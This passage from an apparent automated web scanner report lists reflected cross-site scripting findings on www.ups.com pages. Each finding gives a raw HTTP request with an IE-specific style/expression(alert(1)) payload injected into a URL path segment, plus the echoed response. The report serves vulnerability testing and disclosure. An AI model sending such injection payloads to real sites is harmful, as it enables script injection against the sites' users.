This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us7ae54"style%3d"x%3aexpression(alert(1))"37c623b859e/en/register/reasons/index.html?WT.svl=SubNav HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:36 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 35937


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us7ae54"style="x:expression(alert(1))"37c623b859e/en/register/reasons/index.html?WT.svl=SubNav">
...[SNIP]...

1.71. http://www.ups.com/content/us/en/register/reasons/index.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/register/reasons/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f552a"style%3d"x%3aexpression(alert(1))"4ebe5159dea was submitted in the REST URL parameter 3. This input was echoed as f552a"style="x:expression(alert(1))"4ebe5159dea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/enf552a"style%3d"x%3aexpression(alert(1))"4ebe5159dea/register/reasons/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:39 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 35909


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/enf552a"style="x:expression(alert(1))"4ebe5159dea/register/reasons/index.html">
...[SNIP]...

1.72. http://www.ups.com/content/us/en/resources/index.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/resources/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5693e"style%3d"x%3aexpression(alert(1))"d23773eb856 was submitted in the REST URL parameter 2. This input was echoed as 5693e"style="x:expression(alert(1))"d23773eb856 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us5693e"style%3d"x%3aexpression(alert(1))"d23773eb856/en/resources/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:05 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 63629


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us5693e"style="x:expression(alert(1))"d23773eb856/en/resources/index.html">
...[SNIP]...

1.73. http://www.ups.com/content/us/en/resources/index.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/resources/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4c78"style%3d"x%3aexpression(alert(1))"8743722626c was submitted in the REST URL parameter 3. This input was echoed as b4c78"style="x:expression(alert(1))"8743722626c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/enb4c78"style%3d"x%3aexpression(alert(1))"8743722626c/resources/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:06 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 63629


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/enb4c78"style="x:expression(alert(1))"8743722626c/resources/index.html">
...[SNIP]...

1.74. http://www.ups.com/content/us/en/resources/pay/index.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/resources/pay/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b225"style%3d"x%3aexpression(alert(1))"51c06fe1295 was submitted in the REST URL parameter 2. This input was echoed as 5b225"style="x:expression(alert(1))"51c06fe1295 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us5b225"style%3d"x%3aexpression(alert(1))"51c06fe1295/en/resources/pay/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:19 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44746


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us5b225"style="x:expression(alert(1))"51c06fe1295/en/resources/pay/index.html">
...[SNIP]...

1.75. http://www.ups.com/content/us/en/resources/pay/index.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/resources/pay/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70de7"style%3d"x%3aexpression(alert(1))"2a2e6173e9c was submitted in the REST URL parameter 3. This input was echoed as 70de7"style="x:expression(alert(1))"2a2e6173e9c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/en70de7"style%3d"x%3aexpression(alert(1))"2a2e6173e9c/resources/pay/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:21 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44306


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en70de7"style="x:expression(alert(1))"2a2e6173e9c/resources/pay/index.html">
...[SNIP]...

1.76. http://www.ups.com/content/us/en/resources/service/delivery_change.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/resources/service/delivery_change.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5219"style%3d"x%3aexpression(alert(1))"8878c7088f8 was submitted in the REST URL parameter 2. This input was echoed as b5219"style="x:expression(alert(1))"8878c7088f8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/usb5219"style%3d"x%3aexpression(alert(1))"8878c7088f8/en/resources/service/delivery_change.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:13 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 38032


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/usb5219"style="x:expression(alert(1))"8878c7088f8/en/resources/service/delivery_change.html">
...[SNIP]...

1.77. http://www.ups.com/content/us/en/resources/service/delivery_change.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/resources/service/delivery_change.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload edff4"style%3d"x%3aexpression(alert(1))"804f67be8a3 was submitted in the REST URL parameter 3. This input was echoed as edff4"style="x:expression(alert(1))"804f67be8a3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/enedff4"style%3d"x%3aexpression(alert(1))"804f67be8a3/resources/service/delivery_change.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:18 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 37592


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/enedff4"style="x:expression(alert(1))"804f67be8a3/resources/service/delivery_change.html">
...[SNIP]...

1.78. http://www.ups.com/content/us/en/resources/service/index.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/resources/service/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8721"style%3d"x%3aexpression(alert(1))"28636025260 was submitted in the REST URL parameter 2. This input was echoed as d8721"style="x:expression(alert(1))"28636025260 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/usd8721"style%3d"x%3aexpression(alert(1))"28636025260/en/resources/service/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:15 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 43067


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/usd8721"style="x:expression(alert(1))"28636025260/en/resources/service/index.html">
...[SNIP]...

1.79. http://www.ups.com/content/us/en/resources/service/index.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/resources/service/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13f5b"style%3d"x%3aexpression(alert(1))"13ae836b076 was submitted in the REST URL parameter 3. This input was echoed as 13f5b"style="x:expression(alert(1))"13ae836b076 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/en13f5b"style%3d"x%3aexpression(alert(1))"13ae836b076/resources/service/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:18 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 43507


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en13f5b"style="x:expression(alert(1))"13ae836b076/resources/service/index.html">
...[SNIP]...

1.80. http://www.ups.com/content/us/en/resources/ship/fraud.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/resources/ship/fraud.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98a12"style%3d"x%3aexpression(alert(1))"cb99259b504 was submitted in the REST URL parameter 2. This input was echoed as 98a12"style="x:expression(alert(1))"cb99259b504 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us98a12"style%3d"x%3aexpression(alert(1))"cb99259b504/en/resources/ship/fraud.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:13 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 63972


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us98a12"style="x:expression(alert(1))"cb99259b504/en/resources/ship/fraud.html">
...[SNIP]...

1.81. http://www.ups.com/content/us/en/resources/ship/fraud.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/resources/ship/fraud.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 429db"style%3d"x%3aexpression(alert(1))"4ada58a2fc4 was submitted in the REST URL parameter 3. This input was echoed as 429db"style="x:expression(alert(1))"4ada58a2fc4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/en429db"style%3d"x%3aexpression(alert(1))"4ada58a2fc4/resources/ship/fraud.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:17 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 64412


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en429db"style="x:expression(alert(1))"4ada58a2fc4/resources/ship/fraud.html">
...[SNIP]...

1.82. http://www.ups.com/content/us/en/resources/ship/index.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/resources/ship/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7790d"style%3d"x%3aexpression(alert(1))"6af3f34d8c0 was submitted in the REST URL parameter 2. This input was echoed as 7790d"style="x:expression(alert(1))"6af3f34d8c0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us7790d"style%3d"x%3aexpression(alert(1))"6af3f34d8c0/en/resources/ship/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:07 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 55206


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us7790d"style="x:expression(alert(1))"6af3f34d8c0/en/resources/ship/index.html">
...[SNIP]...

1.83. http://www.ups.com/content/us/en/resources/ship/index.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/resources/ship/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38e38"style%3d"x%3aexpression(alert(1))"dfe01cfd7cb was submitted in the REST URL parameter 3. This input was echoed as 38e38"style="x:expression(alert(1))"dfe01cfd7cb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/en38e38"style%3d"x%3aexpression(alert(1))"dfe01cfd7cb/resources/ship/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:12 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 55206


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en38e38"style="x:expression(alert(1))"dfe01cfd7cb/resources/ship/index.html">
...[SNIP]...

1.84. http://www.ups.com/content/us/en/resources/ship/terms/privacy.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/resources/ship/terms/privacy.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be5e8"style%3d"x%3aexpression(alert(1))"2bd8dfca6c2 was submitted in the REST URL parameter 2. This input was echoed as be5e8"style="x:expression(alert(1))"2bd8dfca6c2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/usbe5e8"style%3d"x%3aexpression(alert(1))"2bd8dfca6c2/en/resources/ship/terms/privacy.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:11 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 50161


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/usbe5e8"style="x:expression(alert(1))"2bd8dfca6c2/en/resources/ship/terms/privacy.html">
...[SNIP]...

1.85. http://www.ups.com/content/us/en/resources/ship/terms/privacy.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/resources/ship/terms/privacy.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2efc9"style%3d"x%3aexpression(alert(1))"e2d5151843d was submitted in the REST URL parameter 3. This input was echoed as 2efc9"style="x:expression(alert(1))"e2d5151843d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/en2efc9"style%3d"x%3aexpression(alert(1))"e2d5151843d/resources/ship/terms/privacy.html?WT.svl=Footer HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:16 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 50629


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en2efc9"style="x:expression(alert(1))"e2d5151843d/resources/ship/terms/privacy.html?WT.svl=Footer">
...[SNIP]...

1.86. http://www.ups.com/content/us/en/resources/ship/terms/shipping/index.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/resources/ship/terms/shipping/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1657c"style%3d"x%3aexpression(alert(1))"d0105cd917d was submitted in the REST URL parameter 2. This input was echoed as 1657c"style="x:expression(alert(1))"d0105cd917d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us1657c"style%3d"x%3aexpression(alert(1))"d0105cd917d/en/resources/ship/terms/shipping/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:07 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
